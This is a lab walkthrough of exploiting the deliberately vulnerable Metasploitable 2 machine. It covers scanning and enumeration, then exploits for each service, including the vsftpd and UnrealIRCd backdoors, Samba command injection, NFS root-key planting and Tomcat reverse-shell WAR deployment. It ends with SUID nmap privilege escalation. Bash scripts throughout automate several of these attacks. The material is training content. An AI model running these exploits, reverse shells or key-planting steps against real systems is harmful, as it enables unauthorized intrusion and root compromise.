Metasploitable 2
Metasploitable 2 is a purposely vulnerable virtual machine designed for security testing, training and education. This page is a complete walkthrough of the machine: scanning and enumeration first, then service-by-service exploitation, and finally privilege escalation.
Scanning
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -O -p- 192.168.204.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 04:57 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00067s latency).
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.204.137
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
|_ssl-date: 2024-04-27T09:00:29+00:00; +7s from scanner time.
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 48158/udp mountd
| 100005 1,2,3 53046/tcp mountd
| 100021 1,3,4 39352/udp nlockmgr
| 100021 1,3,4 52660/tcp nlockmgr
| 100024 1 36532/tcp status
|_ 100024 1 37990/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 9
| Capabilities flags: 43564
| Some Capabilities: Speaks41ProtocolNew, SupportsTransactions, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, Support41Auth, SupportsCompression
| Status: Autocommit
|_ Salt: ddGt6L^rC8/!VoJfBTbp
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2024-04-27T09:00:29+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after: 2010-04-16T14:07:45
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 2:37:34
| source ident: nmap
| source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_ error: Closing Link: pydyrtxam[192.168.204.137] (Quit: pydyrtxam)
6697/tcp open irc UnrealIRCd (Admin email [email protected])
| irc-info:
| users: 2
| servers: 1
| lusers: 2
| lservers: 0
| server: irc.Metasploitable.LAN
| version: Unreal3.2.8.1. irc.Metasploitable.LAN
| uptime: 0 days, 2:37:34
| source ident: nmap
| source host: 97C828B9.D560E8F8.FFFA6D49.IP
|_ error: Closing Link: aglkdhksl[192.168.204.137] (Quit: aglkdhksl)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
36532/tcp open status 1 (RPC #100024)
43137/tcp open java-rmi GNU Classpath grmiregistry
52660/tcp open nlockmgr 1-4 (RPC #100021)
53046/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:71:62:0D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: metasploitable
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: metasploitable.localdomain
|_ System time: 2024-04-27T05:00:17-04:00
|_clock-skew: mean: 1h00m07s, deviation: 2h00m00s, median: 7s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 151.23 seconds
Enumeration
Netbios Enumeration
We can give a whole range to nbtscan on Kali (e.g. nbtscan 192.168.204.0/24) and enumerate the subnet; the output shows the NetBIOS name of the machine, METASPLOITABLE. Similarly, we can run an nmap scan with the nbstat script (nmap --script nbstat 192.168.204.136), which is what produced the nbstat line in the host script results above.
Windows also has a built-in tool for this, nbtstat: nbtstat -A <ip> queries a remote host, and nbtstat -c shows the current NetBIOS name cache on the local machine.

SMB Enumeration
Nmap provides a number of NSE scripts for SMB enumeration (nmap -p 139,445 --script 'smb-enum-*' 192.168.204.136 runs the whole family).

For example, we can use the smb-os-discovery script to fingerprint the OS through SMB; it reports Unix (Samba 3.0.20-Debian), as in the scan above.
Similarly, we can list shares with smbclient (smbclient -L //192.168.204.136 -N; -N asks for a null session, i.e. no password).
Similarly, we can check whether we have read or write access on the shares with smbmap (smbmap -H 192.168.204.136).
We can see that we have write access on the tmp share, which will be useful in the exploitation phase.
We can run the automated script enum4linux (enum4linux -a 192.168.204.136) to extract usernames as well.
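As an added example (not code from the original walkthrough), the enumeration commands above collected into one script, with a small parser that picks the writable shares out of smbmap's share table so they can be handed straight to the exploitation phase. The smbmap sample inside is constructed to mimic the tool's output for this target; TARGET is assumed to be the lab address from the scan.

```shell
#!/usr/bin/env bash
# Added example (not the page's own code): anonymous SMB enumeration of
# Metasploitable 2 plus a parser that extracts writable shares from
# smbmap's table. Assumption: TARGET is the lab host from the nmap scan.
set -u
TARGET="${TARGET:-192.168.204.136}"

# Null-session share listing; Samba 3.0.20 on the target accepts it.
list_shares() {
  smbclient -L "//$1" -N
}

# Per-share permissions as the anonymous user.
share_perms() {
  smbmap -H "$1" -u '' -p ''
}

# Users, groups, shares and OS details in one pass.
enum_all() {
  enum4linux -a "$1"
}

# Parse smbmap's share table (name, permissions, comment) and print the
# names of shares the anonymous user can write to. Header and separator
# lines never contain "READ, WRITE", so they fall through.
writable_shares() {
  grep 'READ, WRITE' | awk '{ print $1 }'
}

# Constructed sample of smbmap output for this target (the real tool
# pads the columns with tabs; whitespace splitting handles both).
SAMPLE_SMBMAP='[+] IP: 192.168.204.136:445   Name: 192.168.204.136
    Disk        Permissions   Comment
    ----        -----------   -------
    print$      NO ACCESS     Printer Drivers
    tmp         READ, WRITE   oh noes!
    opt         NO ACCESS
    IPC$        NO ACCESS     IPC Service (metasploitable server (Samba 3.0.20-Debian))
    ADMIN$      NO ACCESS     IPC Service (metasploitable server (Samba 3.0.20-Debian))'

# Against a live target: the writable shares smbmap found.
live_writable_shares() {
  share_perms "$1" | writable_shares
}

# Usage: ./smb_enum.sh 192.168.204.136
if [ $# -gt 0 ]; then
  list_shares "$1"
  enum_all "$1"
  printf 'writable shares: %s\n' "$(live_writable_shares "$1")"
fi
```

On this box the only hit is tmp, which is exactly the share the manual Samba exploitation below connects to.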

SMTP Enumeration
We can also gather information about a host or network from a loosely configured mail server. The Simple Mail Transfer Protocol (SMTP) supports several interesting commands, such as VRFY and EXPN. A VRFY request asks the server to verify an email address, while EXPN asks the server for the membership of a mailing list. These can often be abused to confirm which users exist on a mail server, which is useful information during a penetration test; the scan above shows the Postfix server advertising VRFY in its EHLO reply.
We can use the VRFY command to check whether a user exists on the SMTP server: connect with nc 192.168.204.136 25 and send VRFY root. Postfix answers 252 2.0.0 root for an existing user and 550 5.1.1 ... User unknown for one that does not exist.
We can use the Metasploit auxiliary module auxiliary/scanner/smtp/smtp_enum to enumerate SMTP users from a wordlist.
We can use smtp-user-enum to check a list of users (smtp-user-enum -M VRFY -U users.txt -t 192.168.204.136).
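As an added example (not the walkthrough's own commands), VRFY enumeration done by hand with nc, together with a classifier for the reply codes so a wordlist run collapses to the accounts that exist. The sample replies inside are constructed in the shape Postfix uses; TARGET is assumed to be the lab host.

```shell
#!/usr/bin/env bash
# Added example (not the page's own code): SMTP user enumeration with VRFY
# over nc, plus a reply-code classifier. Assumptions: TARGET is the lab
# host; SAMPLE_* are constructed replies in Postfix's format.
set -u
TARGET="${TARGET:-192.168.204.136}"

# Map one SMTP reply line to valid / unknown / other.
# 250 and 252 mean the server accepted (or could not reject) the mailbox,
# 550 means it does not exist. Anything else (502 when VRFY is disabled,
# 503 when the server insists on HELO first) means VRFY is not going to
# enumerate anything and EXPN or RCPT TO should be tried instead.
classify_vrfy() {
  case "$1" in
    250*|252*) echo valid ;;
    550*)      echo unknown ;;
    *)         echo other ;;
  esac
}

# One VRFY against the target. Postfix does not require HELO before VRFY,
# so the reply is the second line: banner (220), VRFY answer, then 221.
vrfy_one() {
  printf 'VRFY %s\r\nQUIT\r\n' "$2" \
    | nc -w 3 "$1" 25 \
    | sed -n '2p' | tr -d '\r'
}

# Feed a wordlist (one name per line on stdin) through vrfy_one and print
# "name<TAB>status" per user. smtp-user-enum -M VRFY does the same job
# with threads.
vrfy_users() {
  while IFS= read -r user; do
    [ -n "$user" ] || continue
    status=$(classify_vrfy "$(vrfy_one "$1" "$user")")
    printf '%s\t%s\n' "$user" "$status"
  done
}

# Keep only the names that exist from vrfy_users output.
only_valid() {
  awk -F'\t' '$2 == "valid" { print $1 }'
}

# Constructed replies, as Postfix formats them, for an offline check.
SAMPLE_ROOT='252 2.0.0 root'
SAMPLE_NOBODY='550 5.1.1 <nosuchuser>: Recipient address rejected: User unknown in local recipient table'

# Usage: printf 'root\nmsfadmin\nnosuchuser\n' | ./smtp_vrfy.sh "$TARGET"
if [ $# -gt 0 ]; then
  vrfy_users "$1" | only_valid
fi
```

Note that 252 is deliberately counted as a hit: it is the code Postfix uses for "cannot VRFY, but will accept mail for it", and on this server it is only returned for local accounts.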
NFS Enumeration
We can list the exports with showmount -e 192.168.204.136.
We can see that the root of the file system (/) is exported to everyone; we can mount it and use it in the exploitation phase.
Port 21 FTP Exploitation Metasploitable2
Scanning
Port 21 is open on Metasploitable 2 and is running vsftpd 2.3.4, a release whose distribution tarball was tampered with in 2011 so that it contains a backdoor.
Manual Exploitation vsftpd 2.3.4
The trigger is a username ending in ":)" (a smiley); the password can be anything. When the backdoored server sees it, it opens a root shell listening on TCP port 6200, to which you can then connect with nc or telnet. The listener only lives as long as that vsftpd child process, so trigger it and connect promptly.
Manual Exploitation vsftpd 2.3.4 Method 2
We can use exploits from Exploit-DB. Search for the exploit with searchsploit vsftpd 2.3.4.
Now copy the exploit locally (searchsploit -m <path shown in the results>).
Now run it against the target, and we get the shell.
FTP exploitation - Metasploit
Search for vsftpd in Metasploit (search vsftpd); the module is exploit/unix/ftp/vsftpd_234_backdoor.
Now use it, set RHOSTS to the target, and run it. We will get a root shell. This module carries no payload of its own: it sends the smiley trigger and then connects to port 6200, so the session is a plain command shell rather than Meterpreter.
Port 445 SMB Exploitation Metasploitable2
Scan the SMB port with the vuln and vulners scripts (nmap -p 445 --script vuln,vulners 192.168.204.136).
As the service scan only reported "Samba smbd 3.X - 4.X" on port 139, we can use the Metasploit auxiliary module auxiliary/scanner/smb/smb_version to pin down the version.
In the search results the scanner is at number 9 (the numbering depends on the Metasploit version, so select it by name if it differs).
Running it, we get the Samba version (Samba 3.0.20-Debian).
Now let us see what searchsploit finds for Samba 3.0.20.
It lists the "username map script" command execution bug (CVE-2007-2447), affecting 3.0.20 up to 3.0.25rc3, so we have a Metasploit module (exploit/multi/samba/usermap_script) to exploit the vulnerability.
Samba exploitation Metasploitable 2 with Metasploit

Manual SMB (Samba Exploitation) on Metasploitable 2 without metasploit
Use smbclient to connect to the shares. We can see that we can connect anonymously (a null session).
Here we have the tmp share. It is writable, which we noted during enumeration, but what we actually leverage is the bug in Samba's username map script handling: any share we can open a session on will do, because the injection happens during authentication.
Now connect to it and check the available commands with the help command.
Now open a listener on the attacking machine (nc -lvnp 4444).
Now, from the smbclient prompt, use the logon command with a username that carries a shell command in backticks; smbd hands the username to /bin/sh while evaluating the map script, so the command runs as root.

And we get the shell.

SMB writable share - Wide links
Samba, when configured with a writable file share and "wide links" enabled (the default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and the writable tmp share.
Now we can use the Metasploit module auxiliary/admin/smb/samba_symlink_traversal to exploit it (set SMBSHARE to tmp and RHOSTS to the target). It creates a symbolic link inside the share that points at /.
Now we have a directory named rootfs inside the tmp share through which we can read the complete file system: smbclient //192.168.204.136/tmp -N, then cd rootfs.
Port 1524 Remote Shell Metasploitable2
We saw an open port 1524 on the machine. We can fingerprint it with a version scan of that port (nmap -sV -p 1524 192.168.204.136).
We can see that it is a bind shell (nmap labels it "Metasploitable root shell"). We can connect to it with nc 192.168.204.136 1524.
And we are connected to the backdoor as root; no authentication is asked for at all.
Port 5900 VNC Exploitation Metasploitable2
First scan the service (nmap -sV -p 5900 192.168.204.136).
The port is open, but no vulnerability is reported for the service itself. We will try to brute force the password with Metasploit.
Bruteforcing VNC Metasploit
Search for VNC auxiliary modules (search vnc).
We have the vnc_login module (auxiliary/scanner/vnc/vnc_login). Select the module and see its options.
Set the target. Classic VNC authentication (security type 2, as in the scan) is password-only, so the username option does not matter. We will be using the default Metasploit wordlist.
Run the module and it finds the password, which is password.
Now we can use a VNC viewer to connect to the target (vncviewer 192.168.204.136).

Port 6667 ircd Exploitation Metasploitable2
Scanning port 6667
First scan the port with the vuln script to see if we get some useful information (nmap -p 6667 --script vuln 192.168.204.136).
We can see that the irc-unrealircd-backdoor script reports the server as a trojaned version of UnrealIRCd.
Vulnerability Assessment
Let us see if searchsploit finds something.
We do have "UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)".
Unreal IRCD Exploitation with Metasploit
Let us fire up Metasploit and exploit it with exploit/unix/irc/unreal_ircd_3281_backdoor.
Set the payload explicitly, for example cmd/unix/bind_ruby (cmd/unix/reverse_perl is the other usual choice if a bind shell is blocked).
Now run it, and we will get the shell.
Port 2049 NFS Exploitation Metasploitable 2
First quickly scan the target (nmap -sV -p 111,2049 192.168.204.136).
We can see that the port is open. Now we can see which NFS exports are available to be mounted.
┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.204.136
Export list for 192.168.204.136:
/ *
showmount -e asks the NFS server at 192.168.204.136 for its export list. The output has one line per export: the exported path, then the clients allowed to mount it. Here the only export is / (the root of the file system) and the client list is *, so any host that can reach the server may mount it. The export is also read-write and does not squash root, which is what lets us write into /root below.
Now we can mount it (sudo mount -t nfs 192.168.204.136:/ /mnt/nfs).
Now we can generate an SSH key pair with ssh-keygen. Use an RSA key: the target runs OpenSSH 4.7p1, which does not know ed25519 keys.
Now copy the public key into /root/.ssh under the mount point.
Now append it to the authorized_keys file there.
We can now connect to the machine with SSH as root. On a current Kali the connection usually fails at first with "no matching host key type found. Their offer: ssh-rsa,ssh-dss": the modern OpenSSH client refuses the legacy algorithms the old server offers. Re-enable them for this host with -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa and the login goes through.
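As an added example (not the walkthrough's own commands), the NFS path from the enumeration section through to the root SSH login here, including the two things that break it on a current Kali: the old server only speaks ssh-rsa/ssh-dss, and only an RSA key will be accepted. The showmount sample inside is constructed from the output above; TARGET, MNT and KEY are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not the page's own code): from a world-readable NFS
# export of / to a root SSH login on Metasploitable 2.
# Assumptions: TARGET is the lab host, MNT a local mount point, KEY the
# RSA key pair generated here.
set -u
TARGET="${TARGET:-192.168.204.136}"
MNT="${MNT:-/mnt/nfs}"
KEY="${KEY:-$HOME/.ssh/ms2_rsa}"

# Parse "showmount -e" output into "export<TAB>clients" lines, skipping
# the header. A client list of "*" means open to every host.
parse_exports() {
  awk 'NR > 1 && NF >= 2 { print $1 "\t" $2 }'
}

# Only the exports that any host may mount.
world_exports() {
  parse_exports | awk -F'\t' '$2 == "*" { print $1 }'
}

# Mount the root export. nolock avoids needing rpc.statd on our side;
# vers=3 is what the 2008-era server handles best.
mount_root() {
  sudo mkdir -p "$MNT"
  sudo mount -t nfs -o nolock,vers=3 "$TARGET:/" "$MNT"
}

# Generate an RSA key (OpenSSH 4.7 does not support ed25519) and append
# the public half to root's authorized_keys on the mounted filesystem.
# The export has no root_squash, so our root writes land as root.
plant_key() {
  [ -f "$KEY" ] || ssh-keygen -t rsa -b 2048 -N '' -f "$KEY"
  sudo mkdir -p "$MNT/root/.ssh"
  sudo sh -c "cat '$KEY.pub' >> '$MNT/root/.ssh/authorized_keys'"
}

# Log in. The two -o options re-enable the legacy algorithms that recent
# OpenSSH clients reject ("no matching host key type found"). On clients
# older than OpenSSH 8.5 the second option is spelled
# PubkeyAcceptedKeyTypes instead.
ssh_root() {
  ssh -i "$KEY" \
      -o HostKeyAlgorithms=+ssh-rsa \
      -o PubkeyAcceptedAlgorithms=+ssh-rsa \
      "root@$TARGET"
}

# Constructed from the showmount output on this page.
SAMPLE_SHOWMOUNT='Export list for 192.168.204.136:
/ *'

# Usage: ./nfs_to_ssh.sh run
if [ $# -gt 0 ]; then
  showmount -e "$TARGET" | world_exports
  mount_root
  plant_key
  ssh_root
fi
```

If the mount itself fails with "access denied by server", the export list is worth re-reading: an export restricted to a subnet (for example "/srv 10.0.0.0/24") is filtered out by world_exports because no client list of "*" is present.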
Ports 512,513,514 remote services exploitations - Metasploitable 2
TCP ports 512, 513 and 514 carry the Berkeley "r" services (rexec, rlogin and rsh), and they have been misconfigured to allow remote access from any host (the classic ".rhosts + +" situation).
Let us scan whether these ports are open (nmap -sV -p 512,513,514 192.168.204.136).
Now we can connect with rlogin -l root 192.168.204.136 and are dropped straight into a root shell without a password. One caveat: on a current Kali, rlogin is an alternatives symlink to ssh unless the rsh-client package is installed (sudo apt install rsh-client), so install it first or the command will quietly try SSH instead.
Port 3632 distccd exploitation - Metasploitable 2
distcc makes it easy to scale large compiler jobs across a farm of like-configured systems. The problem with this service is that it accepts jobs from anyone and lets the client name the "compiler" to run, so an attacker can easily abuse it to run a command of their choice (CVE-2004-2687).
Let us scan it (nmap -sV -p 3632 192.168.204.136; nmap's distcc-cve2004-2687 script can run a test command through it as well).
We can now use Metasploit (exploit/unix/misc/distcc_exec) to exploit it. The resulting shell runs as the unprivileged daemon user rather than root, so this entry point needs the privilege escalation at the end of the page.
Port 1099 - Java-rmi exploitation - Metasploitable 2
Let us first scan the target (nmap -sV -p 1099 192.168.204.136): a GNU Classpath RMI registry.
Now we can use the Metasploit module exploit/multi/misc/java_rmi_server to exploit it. It abuses the registry's default remote class loading to make the server fetch and run a Java payload from our machine; set RHOSTS and a java payload and run.
Port 5432 Postgresql Exploitation - Metasploitable 2
Let us first scan the target (nmap -sV -p 5432 192.168.204.136): PostgreSQL 8.3.
Let us exploit it. The database accepts the default credentials postgres:postgres, and the Metasploit module exploit/linux/postgres/postgres_payload uses them to write a shared library into the server and load it, which gives us a shell as the postgres user.
Apache Tomcat/Coyote JSP engine 1.1 Exploitation
Run an nmap scan against the target (nmap -sV -p 8180 192.168.204.136): Apache Tomcat 5.5 behind its Coyote connector.
If we browse to http://192.168.204.136:8180/ we can view the homepage. The Tomcat manager at /manager/html requires a username and password.
We have a module for brute forcing the manager login in Metasploit: auxiliary/scanner/http/tomcat_mgr_login (set RHOSTS to the target and RPORT to 8180).
Here we can see the cracked credentials: tomcat:tomcat.
And we are able to log in to the manager with the found credentials.
If we look closely, the manager page has a form for uploading WAR files. Create a payload with msfvenom (msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker> LPORT=<port> -f war -o shell.war).
Now upload it through the form.
Open a netcat listener on the port the payload connects back to.
Now browse to the deployed application's path (http://192.168.204.136:8180/shell/).
And we have a connection.
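As an added example (not the walkthrough's own commands), the same Tomcat path driven from the shell instead of the browser: a credential check against the manager, WAR generation with msfvenom, deployment through the manager's text interface with an HTTP PUT, and the request that fires the shell. The manager listing inside is constructed in the format Tomcat 5.5 returns; TARGET, ATTACKER, LPORT and the credentials are assumptions (the credentials being the ones the brute force found).

```shell
#!/usr/bin/env bash
# Added example (not the page's own code): Tomcat manager WAR deployment
# from the shell. Assumptions: TARGET/ATTACKER/LPORT as in the rest of the
# walkthrough, CREDS as recovered by tomcat_mgr_login, APP is our context.
set -u
TARGET="${TARGET:-192.168.204.136}"
ATTACKER="${ATTACKER:-192.168.204.137}"
LPORT="${LPORT:-4444}"
CREDS="${CREDS:-tomcat:tomcat}"
APP="${APP:-shell}"
MANAGER="http://$TARGET:8180/manager"

# Interpret the HTTP status of a manager request.
auth_status() {
  case "$1" in
    200) echo ok ;;
    401) echo "bad credentials" ;;
    403) echo "authenticated but missing manager role" ;;
    *)   echo "unexpected HTTP $1" ;;
  esac
}

# Probe the credentials without touching anything.
manager_auth() {
  code=$(curl -s -o /dev/null -w '%{http_code}' -u "$CREDS" "$MANAGER/list")
  auth_status "$code"
}

# Parse "manager/list" output: an "OK - ..." line, then one
# "/path:state:sessions:docbase" line per application. Print the context
# paths that are running.
running_apps() {
  awk -F: 'NR > 1 && $2 == "running" { print $1 }'
}

# Build the WAR. msfvenom's WAR maps the JSP to /*, so any request under
# the context path triggers it.
build_war() {
  msfvenom -p java/jsp_shell_reverse_tcp LHOST="$ATTACKER" LPORT="$LPORT" \
    -f war -o "$APP.war"
}

# Deploy with HTTP PUT to the text interface; on Tomcat 5.5 the manager
# role covers both the HTML form and this endpoint.
deploy_war() {
  curl -s -u "$CREDS" -T "$APP.war" "$MANAGER/deploy?path=/$APP"
}

# Start a listener in another terminal first: nc -lvnp "$LPORT"
trigger() {
  curl -s "http://$TARGET:8180/$APP/" >/dev/null
}

# Constructed in the format Tomcat 5.5's manager/list returns.
SAMPLE_LIST='OK - Listed applications for virtual host localhost
/:running:0:ROOT
/shell:running:0:shell
/jsp-examples:stopped:0:jsp-examples'

# Usage: ./tomcat_war.sh run
if [ $# -gt 0 ]; then
  [ "$(manager_auth)" = ok ] || { manager_auth; exit 1; }
  build_war
  deploy_war
  curl -s -u "$CREDS" "$MANAGER/list" | running_apps
  trigger
fi
```

Checking /manager/list after deployment is the cheap way to tell a failed upload from a payload that simply could not connect back: if /shell is not in the running list, the problem is on the Tomcat side; if it is, look at the listener and the LHOST.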

Privilege Escalation with SUID Binaries
Find the files with the SUID bit set (find / -perm -4000 -type f 2>/dev/null).
We have got lots of binaries with the SUID bit set, and we will use nmap here to do the privilege escalation: the old nmap on this box (interactive mode exists in versions up to 5.21) still has --interactive, and at its prompt !sh spawns a shell while the process is running with root privileges.

Our effective uid is root (id shows euid=0(root) next to our real uid). If the spawned shell resets its effective uid, which bash does unless started with -p, use /bin/sh or bash -p instead.
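As an added example (not the walkthrough's own commands), the SUID hunt with a filter for the binaries that have a known shell escape, and a parser for id(1) output that tells you whether the shell you obtained actually kept root. The find listing inside is a constructed excerpt, not a real capture from the box.

```shell
#!/usr/bin/env bash
# Added example (not the page's own code): SUID enumeration and the nmap
# --interactive escalation on Metasploitable 2, with a check of the result.
# Assumption: SAMPLE_FIND is a constructed excerpt of find(1) output.
set -u

# Enumerate SUID binaries; the stderr redirect hides permission noise.
find_suid() {
  find / -perm -4000 -type f 2>/dev/null
}

# Binaries with a well-known "drop to a shell" escape when SUID. nmap is
# the one used on this page: its interactive mode (versions up to 5.21)
# accepts "!sh".
KNOWN_ESCAPES='nmap vim find awk perl python'

# Filter a find(1) listing down to the interesting candidates.
suid_candidates() {
  while IFS= read -r path; do
    name=${path##*/}
    for k in $KNOWN_ESCAPES; do
      if [ "$name" = "$k" ]; then printf '%s\n' "$path"; break; fi
    done
  done
}

# Parse id(1) output and print the effective uid: the euid= field when
# present, otherwise uid= (no euid field means the two are equal).
effective_uid() {
  awk '{
    e = ""; u = ""
    for (i = 1; i <= NF; i++) {
      if ($i ~ /^euid=/) { e = $i } else if ($i ~ /^uid=/) { u = $i }
    }
    v = (e != "") ? e : u
    sub(/^e?uid=/, "", v); sub(/\(.*/, "", v); print v
  }'
}

# The escalation itself is interactive: run "nmap --interactive", type
# "!sh" at the nmap> prompt, then run "id" in the shell and feed it to
# effective_uid. An answer of 0 means the shell kept root; anything else
# means the shell dropped privileges (try /bin/sh or bash -p).
got_root() {
  [ "$(id | effective_uid)" -eq 0 ]
}

# Constructed excerpt of a find listing on the box.
SAMPLE_FIND='/bin/su
/bin/ping
/usr/bin/passwd
/usr/bin/nmap
/usr/bin/sudo'

# Usage: ./suid.sh scan
if [ $# -gt 0 ]; then
  find_suid | suid_candidates
fi
```

With euid 0 the session can do everything root can, but tools that check the real uid will still show the original user; writing a SUID copy of /bin/sh or adding a root user via /etc/passwd turns it into a full root login if one is needed.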